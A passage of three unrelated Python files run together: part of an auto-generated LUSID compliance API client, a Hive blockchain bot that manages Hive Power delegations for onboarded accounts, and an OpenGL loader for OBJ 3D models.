len(local_var_params['file_name']) < 1): # noqa: E501
raise ApiValueError("Invalid value for parameter `file_name` when calling `run_compliance_check`, length must be greater than or equal to `1`") # noqa: E501
if self.api_client.client_side_validation and 'file_name' in local_var_params and not re.search(r'^[A-Za-z0-9_\-\.]+[A-Za-z0-9_\-\. ]*$', local_var_params['file_name']): # noqa: E501
raise ApiValueError("Invalid value for parameter `file_name` when calling `run_compliance_check`, must conform to the pattern `/^[A-Za-z0-9_\-\.]+[A-Za-z0-9_\-\. ]*$/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'file_name' in local_var_params and local_var_params['file_name'] is not None: # noqa: E501
query_params.append(('fileName', local_var_params['file_name'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['text/plain', 'application/json', 'text/json']) # noqa: E501
header_params['Accept-Encoding'] = "gzip, deflate, br"
# Authentication setting
auth_settings = ['oauth2'] # noqa: E501
response_types_map = {
200: "ComplianceRun",
400: "LusidValidationProblemDetails",
}
return self.api_client.call_api(
'/api/compliance/run', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_types_map=response_types_map,
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
def upsert_compliance_rules(self, request_body, **kwargs): # noqa: E501
"""[EXPERIMENTAL] UpsertComplianceRules: Upsert compliance rules. # noqa: E501
To upsert a new rule, the code field must be left empty, a code will then be assigned and returned as part of the response. | |
# source repository: holgern/delegationOnboardBot
#!/usr/bin/python
from beem import Hive
from beem.comment import Comment
from beem.account import Account
from beem.amount import Amount
from beem.blockchain import Blockchain
from beem.nodelist import NodeList
from beem.exceptions import ContentDoesNotExistsException
from beem.utils import addTzInfo, resolve_authorperm, construct_authorperm, derive_permlink, formatTimeString
from datetime import datetime, timedelta, date
from beem.rc import RC
import time
import shelve
from prettytable import PrettyTable
import json
import logging
import logging.config
import argparse
import os
import sys
from delegationonboardbot.utils import print_block_log, check_config, store_data, read_data
import requests
logger = logging.getLogger(__name__)
def setup_logging(
    default_path='logging.json',
    default_level=logging.INFO
):
    """Configure logging from a JSON dictConfig file.

    Falls back to ``logging.basicConfig`` at *default_level* when the
    configuration file does not exist.
    """
    config_path = default_path
    if not os.path.exists(config_path):
        logger.setLevel(default_level)
        logging.basicConfig()
        return
    with open(config_path, 'rt') as cfg_file:
        logging.config.dictConfig(json.load(cfg_file))
class DelegationOnboardBot:
def __init__(self, config, data_file, hived_instance):
self.config = config
self.data_file = data_file
data_db = read_data(data_file)
if "accounts" in data_db:
accounts = data_db["accounts"]
else:
accounts = {}
self.hive = hived_instance
# add log stats
self.log_data = {"start_time": 0, "last_block_num": None, "new_commands": 0, "stop_block_num": 0,
"stop_block_num": 0, "time_for_blocks": 0}
config_cnt = 0
necessary_fields = ["delegationAccount", "referrerAccount", "adminAccount", "delegationAmount", "delegationLength",
"beneficiaryRemoval", "minPostRC", "muteAccount", "hpWarning", "maxUserHP",
"notifyUser", "delegationMsg", "delegationLengthMsg",
"delegationMuteMsg", "delegationBeneficiaryMsg",
"delegationMaxMsg"]
check_config(self.config, necessary_fields, self.hive)
self.hive.wallet.unlock(self.config["wallet_password"])
self.onboard_api = "https://hiveonboard.com/api/referrer/%s" % self.config["referrerAccount"]
self.blockchain = Blockchain(mode='head', blockchain_instance=self.hive)
self.muted_acc = Account(self.config["muteAccount"], blockchain_instance=self.hive)
self.delegation_acc = Account(self.config["delegationAccount"], blockchain_instance=self.hive)
self.muted_accounts = self.muted_acc.get_mutings(limit=1000)
active_key = False
for key in self.delegation_acc["active"]["key_auths"]:
if key[0] in self.hive.wallet.getPublicKeys(current=True):
active_key = True
for key in self.delegation_acc["owner"]["key_auths"]:
if key[0] in self.hive.wallet.getPublicKeys(current=True):
active_key = True
if not active_key:
logger.warn("Active key from %s is not stored into the beempy wallet." % self.delegation_acc["name"])
rc = RC(blockchain_instance=self.hive)
self.comment_rc_costs = rc.comment(tx_size=4000, permlink_length=40, parent_permlink_length=0)
self.accounts = self.get_referrer(accounts)
self.update_delegations()
self.check_muted(self.muted_accounts)
self.check_delegation_age()
self.check_max_hp()
self.print_account_info()
store_data(self.data_file, "accounts", self.accounts)
def print_account_info(self):
revoked = 0
delegated = 0
delegated_hp = 0
for acc in self.accounts:
if self.accounts[acc]["delegated_hp"] > 0:
delegated += 1
delegated_hp += self.accounts[acc]["delegated_hp"]
if self.accounts[acc]["delegation_revoked"] > 0:
revoked += 1
logger.info("%d accounts have been created with referrer %s" % (len(self.accounts), self.config["referrerAccount"]))
logger.info("%d accounts have received a delegation (%.3f HP)" % (delegated, delegated_hp))
logger.info("%d accounts have been revoked" % revoked)
def get_referrer(self, accounts):
limit = 20
offset = 0
last_result = []
cnt = 0
result = []
while last_result is not None and len(last_result) == limit or cnt == 0:
cnt += 1
r = requests.get(self.onboard_api + '?offset=%d' % (offset))
if r.ok:
last_result = r.json()["items"]
if last_result is not None and len(last_result) > 0:
result += last_result
offset += limit
for r in result:
if r["account"] in accounts:
continue
accounts[r["account"]] = {"timestamp": None, "weight": None, "muted": False, "rc": 0, "hp": 0,
"delegated_hp": 0, "delegation_timestamp": None, "rc_comments": 0,
"delegation_revoked": False}
accounts[r["account"]]["timestamp"] = datetime.utcfromtimestamp(float(r["timestamp"]) / 1000.0)
accounts[r["account"]]["weight"] = r["weight"]
return accounts
def update_delegations(self):
delegations = self.delegation_acc.get_vesting_delegations(start_account='', limit=1000, account=None)
for d in delegations:
if d["delegatee"] in self.accounts:
self.accounts[d["delegatee"]]["delegated_hp"] = self.hive.vests_to_hp(float(Amount(d["vesting_shares"], blockchain_instance=self.hive)))
self.accounts[d["delegatee"]]["delegation_timestamp"] = formatTimeString(d["min_delegation_time"]).replace(tzinfo=None)
def check_max_hp(self):
if self.config["maxUserHP"] <= 0:
return
for account in self.accounts:
if self.accounts[account]["delegated_hp"] == 0:
continue
if self.accounts[account]["delegation_revoked"]:
continue
if self.accounts[account]["hp"] > self.config["maxUserHP"]:
self.remove_delegation(account)
self.notify_account(account, self.config["delegationMaxMsg"])
def check_delegation_age(self):
if self.config["delegationLength"] <= 0:
return
for account in self.accounts:
if self.accounts[account]["delegated_hp"] == 0:
continue
if self.accounts[account]["delegation_revoked"]:
continue
if (datetime.utcnow() - self.accounts[account]["delegation_timestamp"]).total_seconds() / 60 / 60 / 24 > self.config["delegationLength"]:
self.remove_delegation(account)
self.notify_account(account, self.config["delegationLengthMsg"])
def check_muted(self, muted_accounts):
for acc in muted_accounts:
if acc not in self.accounts:
continue
if not self.accounts[acc]["muted"]:
self.accounts[acc]["muted"] = True
store_data(self.data_file, "accounts", self.accounts)
if self.accounts[acc]["delegated_hp"] > 0 and not self.accounts[acc]["delegation_revoked"]:
self.remove_delegation(acc)
self.notify_account(acc, self.config["delegationMuteMsg"])
def notify_admin(self, msg):
if self.config["no_broadcast"]:
logger.info("no_broadcast=True, Would send to %s the following message: %s" % (self.config["adminAccount"], msg))
return
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("Send to %s the following message: %s" % (self.config["adminAccount"], msg))
self.delegation_acc.transfer(self.config["adminAccount"], 0.001, "HIVE", memo=msg)
def notify_account(self, account, msg):
if not self.config["notifyUser"]:
return
if self.config["no_broadcast"]:
logger.info("no_broadcast=True, Would send to %s the following message: %s" % (account, msg))
return
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("Send to %s the following message: %s" % (account, msg))
self.delegation_acc.transfer(account, 0.001, "HIVE", memo=msg)
def check_account_on_activity(self, account, timestamp):
if account not in self.accounts:
return
acc = Account(account, blockchain_instance=self.hive)
self.accounts[account]["rc"] = acc.get_rc_manabar()["current_mana"]
self.accounts[account]["hp"] = acc.get_token_power(only_own_vests=True)
self.accounts[account]["rc_comments"] = self.accounts[account]["rc"] / self.comment_rc_costs
store_data(self.data_file, "accounts", self.accounts)
if self.accounts[account]["delegated_hp"] > 0:
return
if self.accounts[account]["delegation_revoked"]:
return
if self.accounts[account]["hp"] > self.config["maxUserHP"]:
return
if self.accounts[account]["rc_comments"] < self.config["minPostRC"]:
ok = self.add_delegation(account, timestamp)
if ok:
self.notify_account(account, self.config["delegationMsg"])
def check_beneficiaries(self, author, permlink):
if author not in self.accounts:
return
if self.accounts[author]["delegated_hp"] == 0:
return
if self.accounts[author]["delegation_revoked"]:
return
if not self.config["beneficiaryRemoval"]:
return
comment = None
cnt = 0
while comment is None and cnt < 10:
cnt += 1
try:
comment = Comment(construct_authorperm(author, permlink), blockchain_instance=self.hive)
except:
comment = None
time.sleep(3)
referrer_ok = False
for bene in comment["beneficiaries"]:
if bene["account"] == self.config["referrerAccount"] and bene["weight"] == self.accounts[author]["weight"]:
referrer_ok = True
if not referrer_ok:
self.remove_delegation(author)
self.notify_account(author, self.config["delegationBeneficiaryMsg"])
def check_for_sufficient_hp(self):
data_db = read_data(self.data_file)
if "hp_warning_send" in data_db:
hp_warning_send = data_db["hp_warning_send"]
else:
hp_warning_send = False
hp = self.delegation_acc.get_token_power(only_own_vests=True)
if hp_warning_send and hp > self.config["hpWarning"]:
hp_warning_send = False
elif not hp_warning_send and hp < self.config["hpWarning"]:
if not self.config["no_broadcast"]:
hp_warning_send = True
self.notify_admin("Warning: HIVE POWER of @%s is below %.3f HP" % (self.config["delegationAccount"], self.config["hpWarning"]))
store_data(self.data_file, "hp_warning_send", hp_warning_send)
def remove_delegation(self, account):
if self.config["no_broadcast"]:
logger.info("no_broadcast = True, Would remove delegation from %s" % (account))
return False
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("remove delegation from %s" % (account))
try:
self.delegation_acc.delegate_vesting_shares(account, 0)
except Exception as e:
logger.warn(str(e))
self.notify_admin("Could not undelegate HP from %s" % (account))
return False
self.accounts[account]["delegation_revoked"] = True
store_data(self.data_file, "accounts", self.accounts)
return True
def add_delegation(self, account, timestamp):
if self.config["no_broadcast"]:
logger.info("no_broadcast = True, Would add delegation of %.2f HP to %s" % (self.config["delegationAmount"], account))
return False
if self.delegation_acc.blockchain.wallet.locked():
self.delegation_acc.blockchain.wallet.unlock(self.config["wallet_password"])
logger.info("add delegation of %.2f HP to %s" % (self.config["delegationAmount"], account))
try:
self.delegation_acc.delegate_vesting_shares(account, self.hive.hp_to_vests(self.config["delegationAmount"]))
except Exception as e:
logger.warn(str(e))
self.notify_admin("Could not delegate %.2f HP to %s" % (self.config["delegationAmount"], account))
return False
self.accounts[account]["delegated_hp"] = self.config["delegationAmount"]
self.accounts[account]["delegation_timestamp"] = timestamp
self.accounts[account]["delegation_revoked"] = False
store_data(self.data_file, "accounts", self.accounts)
return True
def run(self, start_block, stop_block):
if self.hive.wallet.locked():
self.hive.wallet.unlock(self.config["wallet_password"])
if self.hive.wallet.locked():
logger.error("Could not unlock wallet. Please check wallet_passowrd in config")
return
current_block = self.blockchain.get_current_block_num()
if stop_block is None or stop_block > current_block:
stop_block = current_block
if start_block is None:
start_block = current_block
last_block_num = current_block - 1
else:
last_block_num = start_block - 1
self.check_delegation_age()
self.check_max_hp()
self.check_for_sufficient_hp()
store_data(self.data_file, "accounts", self.accounts)
self.log_data["start_block_num"] = start_block
for op in self.blockchain.stream(start=start_block, stop=stop_block):
self.log_data = print_block_log(self.log_data, op, self.config["print_log_at_block"])
last_block_num = op["block_num"]
timestamp = op["timestamp"].replace(tzinfo=None)
if op["type"] == "comment":
account = op["author"]
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
if op["parent_author"] == "":
self.check_beneficiaries(op["author"], op["permlink"])
elif op["type"] == "vote":
account = op["voter"]
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
elif op["type"] == "transfer":
account = op["from"]
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
elif op["type"] == "custom_json":
if len(op["required_posting_auths"]) > 0:
account = op["required_posting_auths"][0]
elif len(op["required_auths"]) > 0:
account = op["required_auths"][0]
if op["id"] == "follow":
if op["json"] == "":
continue
json_data = json.loads(op["json"])
if "what" not in json_data:
continue
if len(json_data["what"]) == 0:
continue
if json_data["what"][0] != "ignore":
continue
if account == self.config["muteAccount"] and json_data["following"] in self.accounts:
self.check_muted([json_data["following"]])
if account not in list(self.accounts.keys()):
continue
self.check_account_on_activity(account, timestamp)
elif op["type"] == "delegate_vesting_shares":
if op["delegator"] != self.config["delegationAccount"]:
continue
account = op["delegatee"]
if account not in list(self.accounts.keys()):
continue
delegated_hp = self.hive.vests_to_hp(float(Amount(op["vesting_shares"], blockchain_instance=self.hive)))
self.accounts[account]["delegated_hp"] = delegated_hp
self.accounts[account]["delegation_timestamp"] = timestamp
if delegated_hp > 0 and self.accounts[account]["delegation_revoked"]:
self.accounts[account]["delegation_revoked"] = False
elif delegated_hp == 0 and not self.accounts[account]["delegation_revoked"]:
self.accounts[account]["delegation_revoked"] = True
store_data(self.data_file, "accounts", self.accounts)
elif op["type"] == "create_claimed_account":
if op["json_metadata"] == "":
continue
meta_data = json.loads(op["json_metadata"])
if "beneficiaries" not in meta_data:
continue
for entry in meta_data["beneficiaries"]:
if entry["label"] == "referrer" and entry["name"] == self.config["referrerAccount"]:
self.accounts[op["new_account_name"]] = {"timestamp": None, "weight": None, "muted": False, "rc": 0, "hp": 0,
"delegated_hp": 0, "delegation_timestamp": None, "rc_comments": 0,
"delegation_revoked": False}
self.accounts[op["new_account_name"]]["weight"] = entry["weight"]
self.accounts[op["new_account_name"]]["timestamp"] = op["timestamp"].replace(tzinfo=None)
store_data(self.data_file, "accounts", self.accounts)
return last_block_num
def main():
parser = argparse.ArgumentParser()
parser.add_argument("config", help="Config file in JSON format")
parser.add_argument("--logconfig", help="Logger Config file in JSON format", default='logger.json')
parser.add_argument("--datadir", help="Data storage dir", default='.')
parser.add_argument('--list-accounts', action='store_true')
args = parser.parse_args()
setup_logging(default_path=args.logconfig)
logger.info("Loading config: %s" % str(args.config))
config = json.loads(open(os.path.abspath(args.config)).read())
datadir = args.datadir
nodelist = NodeList()
nodelist.update_nodes()
hive = Hive(node=nodelist.get_hive_nodes(), num_retries=5, call_num_retries=3, timeout=15)
blockchain = Blockchain(blockchain_instance=hive)
logger.info(str(hive))
data_file = os.path.join(datadir, 'data.db')
bot = DelegationOnboardBot(
config,
data_file,
hive
)
| |
#<NAME>
#---------------
from PIL import Image
from OpenGL.GL import *
from OpenGL.GLU import *
from numpy import *
import random
import os, re
#from OpenGL.GL.ARB.vertex_buffer_object import *
from OpenGL.arrays import ArrayDatatype as ADT
# psutil is optional: it is only used to check system memory pressure before
# loading large OBJ files; without it the check is skipped entirely.
try:
    import psutil
    psutil_enable = True
except:
    psutil_enable = False
# Memory usage (percent) above which the loaders fall back to the stock cube.
mem_Limit = 80.0
import ctypes
# Directory layout for bundled models: <Folders>/<OBJ>/Cube.obj etc.
folders = "Folders"
obj_files = "OBJ"
def cross(A, B, C):
    """Unit normal of the plane through points A, B, C (corner at B).

    Returns the zero vector when the three points are collinear/degenerate.
    """
    u = (A[0] - B[0], A[1] - B[1], A[2] - B[2])
    w = (C[0] - B[0], C[1] - B[1], C[2] - B[2])
    nx = u[1] * w[2] - u[2] * w[1]
    ny = u[2] * w[0] - u[0] * w[2]
    nz = u[0] * w[1] - u[1] * w[0]
    length = sqrt(nx ** 2 + ny ** 2 + nz ** 2)
    if length != 0:
        return (nx / length, ny / length, nz / length)
    return (nx, ny, nz)
class polygon:
    """A face: parallel lists of vertex / texture-coordinate / normal objects."""
    def __init__(self):
        self.vertex = []
        self.uvtext = []
        self.normal = []
        # Bound-method aliases kept for callers that use the short names.
        self.verts = self.getverts
        self.norms = self.getnormals
        self.texts = self.getuvcoords
    def create_normal(self):
        """Compute the face's plane normal and write it into every normal object."""
        corners = self.verts()
        plane = cross(corners[0], corners[1], corners[2])
        # Re-initialise the (possibly shared) normal objects in place so that
        # all faces referencing them see the update.
        for nrm in self.normal:
            nrm.__init__(plane)
    def getverts(self):
        """Coordinate sequences of this face's vertices."""
        return [v.coords for v in self.vertex]
    def getnormals(self):
        """Coordinate sequences of this face's normals."""
        return [n.coords for n in self.normal]
    def getuvcoords(self):
        """UV coordinate pairs of this face."""
        return [t.coords for t in self.uvtext]
class vertex:
    """A 3-D vertex: its coordinate sequence plus an (optional) OBJ index."""
    def __init__(self, coords, index=-1):
        self.coords = coords
        self.x, self.y, self.z = coords[0], coords[1], coords[2]
        self.index = index
    def __getitem__(self, i):
        # Delegate indexing to the underlying coordinate sequence.
        return self.coords[i]
class texture:
    """A 2-D texture (UV) coordinate."""
    def __init__(self, coords):
        self.coords = coords
        self.x, self.y = coords[0], coords[1]
    def __getitem__(self, i):
        # Delegate indexing to the underlying coordinate sequence.
        return self.coords[i]
class normal:
    """A 3-D normal vector."""
    def __init__(self, coords):
        self.coords = coords
        self.x, self.y, self.z = coords[0], coords[1], coords[2]
    def __getitem__(self, i):
        # Delegate indexing to the underlying coordinate sequence.
        return self.coords[i]
def qualify(faces):
    """Return the faces that have at least one vertex inside the cube [-1, 1]^3."""
    selected = []
    for face in faces:
        for v in face.verts():
            inside = (-1 <= v[0] <= 1) and (-1 <= v[1] <= 1) and (-1 <= v[2] <= 1)
            if inside:
                selected.append(face)
                break  # one qualifying vertex is enough
    return selected
def load(filename):
    """Parse a Wavefront OBJ file into a list of polygon faces.

    Falls back to the stock cube model when system memory usage exceeds
    mem_Limit (only checked when psutil is available).  Missing or invalid
    texture/normal references are padded with defaults; face normals are
    computed when the file defines none.
    """
    verts = []
    norms = []
    uvtex = []
    faces = []
    vcount = 0
    if psutil_enable:
        mem_used = psutil.virtual_memory().percent
    else:
        mem_used = 0.0
    if mem_used > mem_Limit:
        filename = os.path.join(folders, obj_files, "Cube.obj")
    # "with" closes the file even on parse errors (the old code leaked the handle).
    with open(filename, "r") as obj_file:
        for line in obj_file:
            vals = line.split()
            if len(vals) < 1:
                continue
            if vals[0] == "v":
                verts.append(vertex(list(map(float, vals[1:4])), vcount))
                vcount += 1
            if vals[0] == "vt":
                uvtex.append(texture(list(map(float, vals[1:3]))))
            if vals[0] == "vn":
                norms.append(normal(list(map(float, vals[1:4]))))
            if vals[0] == "f":
                faces.append(polygon())
                for f in vals[1:]:
                    w = f.split("/")
                    if verts:
                        faces[-1].vertex.append(verts[int(w[0]) - 1])
                    if uvtex:
                        try:
                            faces[-1].uvtext.append(uvtex[int(w[1]) - 1])
                        except (IndexError, ValueError):
                            # face has no / an invalid "vt" reference
                            faces[-1].uvtext.append(texture([0, 0]))
                    else:
                        faces[-1].uvtext.append(texture([0, 0]))
                    if norms:
                        try:
                            faces[-1].normal.append(norms[int(w[2]) - 1])
                        except (IndexError, ValueError):
                            # face has no / an invalid "vn" reference
                            faces[-1].normal.append(normal([0, 1, 0]))
                    else:
                        faces[-1].normal.append(normal([0, 1, 0]))
    if not norms:
        # No "vn" records in the file: derive per-face plane normals.
        for f in faces:
            f.create_normal()
    return faces
def load_verts(filename):
    """Parse an OBJ file, returning (faces, verts, norms) as separate lists.

    When the file defines no normals they are computed per face and gathered
    per vertex index.  Falls back to the stock cube model under memory
    pressure (psutil only).
    """
    verts = []
    faces = []
    norms = []
    vcount = 0
    if psutil_enable:
        mem_used = psutil.virtual_memory().percent
    else:
        mem_used = 0.0
    if mem_used > mem_Limit:
        filename = os.path.join(folders, obj_files, "Cube.obj")
    # "with" closes the file even on parse errors (the old code leaked the handle).
    with open(filename, "r") as obj_file:
        for line in obj_file:
            vals = line.split()
            if len(vals) < 1:
                continue
            if vals[0] == "v":
                verts.append(vertex(list(map(float, vals[1:4])), vcount))
                vcount += 1
            if vals[0] == "vn":
                norms.append(normal(list(map(float, vals[1:4]))))
            if vals[0] == "f":
                faces.append(polygon())
                for f in vals[1:]:
                    w = f.split("/")
                    if verts:
                        faces[-1].vertex.append(verts[int(w[0]) - 1])
                    if norms:
                        try:
                            faces[-1].normal.append(norms[int(w[2]) - 1])
                        except (IndexError, ValueError):
                            # face has no / an invalid "vn" reference
                            faces[-1].normal.append(normal([0, 1, 0]))
                    else:
                        faces[-1].normal.append(normal([0, 1, 0]))
    if not norms:
        # No "vn" records: compute face normals and index them by vertex.
        norms = [object] * len(verts)
        for f in faces:
            f.create_normal()
            for v, n in zip(f.vertex, f.normal):
                norms[v.index] = n
    return faces, verts, norms
def load_Faces(filename, progress = None, advance = False):
    """Load an animation sequence of OBJ files.

    *filename* names one file of a numbered sequence; every file in the same
    directory that shares the non-digit prefix and the 3-character extension
    is loaded (sorted order) via load_verts().

    progress -- optional progress widget with advance()/set_msg1() methods
    advance  -- when True, step the progress widget once per file
    Returns (Faces, Verts, Norms), one entry per loaded file; loading stops
    early (returning what was gathered so far) on errors or memory pressure.
    """
    print("load_Faces")
    (path, name) = os.path.split(filename)
    extension = name[-3:]
    # Split the basename into a non-digit prefix (group 1) and a trailing
    # digit run (group 2); only numbered names are expanded into a sequence.
    R = re.match(r'(\D*)(\d*)', name)
    Faces = []
    Verts = []
    Norms = []
    if os.path.isdir(path):
        dirs = []
        try:
            dirs = os.listdir(path)
            dirs.sort()
        except(Exception) as detail:
            print('EXC0')
            return Faces, Verts, Norms
        for i in dirs:
            if i[-3:] == extension:
                if R.group(2):
                    # Same prefix => same animation sequence.
                    if R.group(1) == i[:len(R.group(1))]:
                        if psutil_enable:
                            v = psutil.virtual_memory().percent
                        else:
                            v = 0.0
                        # Stop loading more frames under memory pressure.
                        if v > mem_Limit:
                            return Faces, Verts, Norms
                        if progress:
                            try:
                                if advance:
                                    progress.advance("repros\n")
                                progress.set_msg1(str(i))
                            except(Exception) as detail:
                                # Progress widget gone (e.g. dialog closed):
                                # abort the load gracefully.
                                print(detail)
                                return Faces, Verts, Norms
                        faces, verts, norms = load_verts(os.path.join(path, i))
                        Faces.append(faces)
                        Verts.append(verts)
                        Norms.append(norms)
        return Faces, Verts, Norms
    else:
        return Faces, Verts, Norms
class obj_transform():
def __init__(self, faces, Faces = [], Verts = [], Norms = []):
self.faces = faces
self.Faces = [faces,]
self.validate_Faces(len(faces), Faces)
self.Tfaces = [object] * len(self.faces)
for x, f in enumerate(self.faces):
self.Tfaces[x] = polygon()
self.Tfaces[x].vertex = [object] * len(f.verts())
self.modelview = False
self.angle = 0
self.vector = (0, 1, 0)
self.sx = 1.0
self.sy = 1.0
self.sz = 1.0
self.px = 0
self.py = 0
self.objdisplayList = 0
self.vertex_arrays = False
self.VBO = False
self.Frames = len(self.Faces)
self.frame = 0
self.vert_array3 = [list()] * self.Frames
self.vert_array4 = [list()] * self.Frames
self.vert_array_Fan = [list()] * self.Frames
self.verts3 = [list()] * self.Frames
self.verts4 = [list()] * self.Frames
self.verts_Fan = [list()] * self.Frames
self.norm_array3 = [list()] * self.Frames
self.norm_array4 = [list()] * self.Frames
self.norm_array_Fan = [list()] * self.Frames
self.norms3 = [list()] * self.Frames
self.norms4 = [list()] * self.Frames
self.norms_Fan = [list()] * self.Frames
self.vert_array_Lines = [list()] * self.Frames
self.norm_array_Lines = [list()] * self.Frames
self.text_array_Lines = list()
self.lines = [list()] * self.Frames
self.line_norms = [list()] * self.Frames
self.Edges, self.Lines = self.build_Edges(faces)
self.Verts = Verts
self.Norms = Norms
try:
print("Faces", len(self.Faces[0]))
print("Verts", len(self.Verts[0]))
print("Norms", len(self.Norms[0]))
except:
pass
self.wireDraw = False
self.objectDraw = True
    def cleanup(self):
        # Release GPU-side buffers.  NOTE(review): the "del i" loops below
        # only unbind the local loop name on each iteration -- they do NOT
        # free the face objects, which remain referenced by self.Faces /
        # self.faces; kept as-is to preserve behavior.
        for f in self.Faces:
            for i in f:
                del i
        for i in self.faces:
            del i
        if self.VBO:
            # 12 buffers were allocated in set_up_VBO.
            glDeleteBuffers(12, self.buffers)
def build_Edges(self, Faces):
edges = {}
Edges = []
Lines = []
for i in Faces:
index = []
verts = {}
norms = {}
texts = {}
for v, n, t in zip(i.vertex, i.normal, i.uvtext):
index.append(v.index)
verts[v.index] = v
norms[v.index] = n
texts[v.index] = t
INDEX = index[1:] + [index[0]]
for x, y in zip(index, INDEX):
edge = (x, y)
if (y, x) in edges:
pass
else:
edges[edge] = 1
Edge = (verts[x], verts[y], norms[x], norms[y], texts[x], texts[y])
Edges.append(Edge)
Lines.append(edge)
print("Edges number", len(Edges))
return Edges, Lines
def validate_Faces(self, length, Faces):
print("validate_Faces", length)
for i in Faces:
print(len(i))
if len(i) == length:
self.Faces.append(i)
    def set_up_VBO(self, usage = GL_STATIC_DRAW):
        """Convert the prepared per-frame geometry to float32 and upload it
        into 12 OpenGL buffer objects.

        Buffer layout: 0-2 edge/line vertex|normal|texture, 3-5 triangles,
        6-8 quads, 9-11 triangle fans.  Frame 0 is uploaded; vertex/normal
        buffers use GL_DYNAMIC_DRAW so later frames can be re-uploaded, while
        texture buffers use the caller-supplied *usage* hint.
        """
        self.VBO = True
        print("set_up_VBO", self.Frames)
        # Convert every python list into a float32 numpy array; a frame that
        # fails to convert truncates the usable frame count to that index.
        for x in range(self.Frames):
            try:
                self.verts3[x] = array(self.vert_array3[x], dtype = float32)
                self.verts4[x] = array(self.vert_array4[x], dtype = float32)
                self.verts_Fan[x] = array(self.vert_array_Fan[x], dtype = float32)
                self.norms3[x] = array(self.norm_array3[x], dtype = float32)
                self.norms4[x] = array(self.norm_array4[x], dtype = float32)
                self.norms_Fan[x] = array(self.norm_array_Fan[x], dtype = float32)
                self.lines[x] = array(self.vert_array_Lines[x], dtype = float32)
                self.line_norms[x] = array(self.norm_array_Lines[x], dtype = float32)
            except:
                self.Frames = x
        self.buffers = glGenBuffers(12)
        # --- edge/line buffers ---
        self.buffer_line_array2 = self.buffers[0]
        self.buffer_norm_array2 = self.buffers[1]
        self.buffer_text_array2 = self.buffers[2]
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_line_array2)
        self.buffer_line_array2_size = ADT.arrayByteCount(self.lines[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_line_array2_size, self.lines[0], usage)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array2)
        self.buffer_line_norms_size = ADT.arrayByteCount(self.line_norms[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_line_norms_size, self.line_norms[0], usage)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array2)
        self.line_texts = array(self.text_array_Lines, dtype = float32)
        glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.line_texts), self.line_texts, usage)
        # --- triangle buffers (dynamic: re-uploaded per animation frame) ---
        self.buffer_vert_array3 = self.buffers[3]
        self.buffer_norm_array3 = self.buffers[4]
        self.buffer_text_array3 = self.buffers[5]
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_vert_array3)
        self.buffer_vert_array3_size = ADT.arrayByteCount(self.verts3[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_vert_array3_size, self.verts3[0], GL_DYNAMIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array3)
        self.buffer_norm_array3_size = ADT.arrayByteCount(self.norms3[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_norm_array3_size, self.norms3[0], GL_DYNAMIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array3)
        self.texts3 = array(self.text_array3, dtype = float32)
        glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.texts3), self.texts3, usage)
        # --- quad buffers ---
        self.buffer_vert_array4 = self.buffers[6]
        self.buffer_norm_array4 = self.buffers[7]
        self.buffer_text_array4 = self.buffers[8]
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_vert_array4)
        self.buffer_vert_array4_size = ADT.arrayByteCount(self.verts4[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_vert_array4_size, self.verts4[0], GL_DYNAMIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array4)
        self.buffer_norm_array4_size = ADT.arrayByteCount(self.norms4[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_norm_array4_size, self.norms4[0], GL_DYNAMIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array4)
        self.texts4 = array(self.text_array4, dtype = float32)
        glBufferData(GL_ARRAY_BUFFER, ADT.arrayByteCount(self.texts4), self.texts4, usage)
        # --- triangle-fan buffers (faces with more than 4 vertices) ---
        self.buffer_vert_array_Fan = self.buffers[9]
        self.buffer_norm_array_Fan = self.buffers[10]
        self.buffer_text_array_Fan = self.buffers[11]
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_vert_array_Fan)
        self.buffer_vert_array_Fan_size = ADT.arrayByteCount(self.verts_Fan[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_vert_array_Fan_size, self.verts_Fan[0], GL_DYNAMIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_norm_array_Fan)
        self.buffer_norm_array_Fan_size = ADT.arrayByteCount(self.norms_Fan[0])
        glBufferData(GL_ARRAY_BUFFER, self.buffer_norm_array_Fan_size, self.norms_Fan[0], GL_DYNAMIC_DRAW)
        glBindBuffer(GL_ARRAY_BUFFER, self.buffer_text_array_Fan)
        self.texts_Fan = array(self.text_array_Fan, dtype = float32)
